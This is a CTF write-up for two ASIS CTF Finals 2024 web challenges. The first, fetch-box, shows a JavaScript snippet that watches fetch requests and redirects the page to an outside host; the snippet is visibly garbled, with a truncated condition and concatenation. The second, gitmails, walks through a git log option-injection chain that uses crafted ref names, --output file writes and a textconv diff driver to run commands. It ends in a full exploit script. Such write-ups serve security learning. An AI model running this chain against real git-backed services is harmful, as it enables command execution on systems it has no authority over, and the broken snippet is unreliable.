ASIS CTF Finals 2024 Write-Up

Write-up for ASIS CTF Finals 2024 — Web challenges fetch-box and gitmails.

fetch-box (19 solves)

Use PerformanceObserver to observe fetch requests:

new PerformanceObserver((list) => {
    list.getEntries().forEach((entry) => {
        if ('/ping?')) {
            location = 'https://*' +;
}).observe({entryTypes: ['resource']});

BTW, service worker does not work because it's not HTTPS.

gitmails (5 solves)

git log option injection

            emails = check_output(
                ['git', 'log', '--pretty=format:%ae', 
                *([f'--author={author}'] if author else []),

Here the branch is supposed to be a branch, but it will be an option if it starts with -.

The git CLI does not allow such branch names, but we can modify the refs directly. For example:

cp .git/refs/heads/master .git/refs/heads/--output=config

git log --output for file writing

We can use git log --output to write the log to arbitrary file. Find this in man git log or git | GTFOArgs.

As --pretty=format:%ae is set, we can use the email of each commit for each line in the output, e.g.:

GIT_AUTHOR_EMAIL="pager = /readflag" git commit --allow-empty -m nothing
GIT_AUTHOR_EMAIL='[core]' git commit --allow-empty -m nothing

Approaches that do not work

  • core.fsmonitor: It's on GTFOArgs but it's not triggered by git log.
  • core.pager: The output pipes into the check_output function without an interactive tty, so Git does not use a pager.
  • core.alternateRefsCommand: Need a known path to an objects directory that is not the current repository.
  • diff.external / diff.<driver>.command: Need both -p and --ext-diff but we can only inject a single option.

textconv for command execution

diff.<driver>.textconv can be used to execute arbitrary command with git log -p.

The textconv command is called as <cmd> <filename>, so we can use textconv = /readflag '--give-me-the-f|ag' | tee to output the flag.

We need to set the diff driver in the info/attributes file, such as * [diff=flag] and [diff "flag"] textconv = /readflag.

However, we only have a single commit log (the branch argument is used as an option instead), so we will have identical config and info/attributes, but they have different syntax and contents.

The config needs to be completely valid, while attributes may have syntax errors. So we can append a= diff=flag to config, which is the attribute we need and also a valid line in config. Then add a file with name a= in the repository to see the diff.

Hosting the repository

If we don't want to use a public service like GitHub, we should host the repository to support read-only HTTP clone.

It's actually super easy. Just run git --bare update-server-info in the .git directory and run an HTTP server.

Final script


set -euo pipefail

mkdir exp
cd exp
git init

touch a=
git add .
GIT_AUTHOR_EMAIL='a= diff=flag' git commit -m nothing
GIT_AUTHOR_EMAIL="textconv = /readflag '--give-me-the-f|ag' | tee" git commit --allow-empty -m nothing
GIT_AUTHOR_EMAIL='[diff "flag"]' git commit --allow-empty -m nothing

cd .git
cp refs/heads/master refs/heads/--output=config
mkdir refs/heads/--output=info
cp refs/heads/master refs/heads/--output=info/attributes
cp refs/heads/master refs/heads/-p

git --bare update-server-info
python -m http.server 1337

Then ask the challenge server to clone your HTTP git server.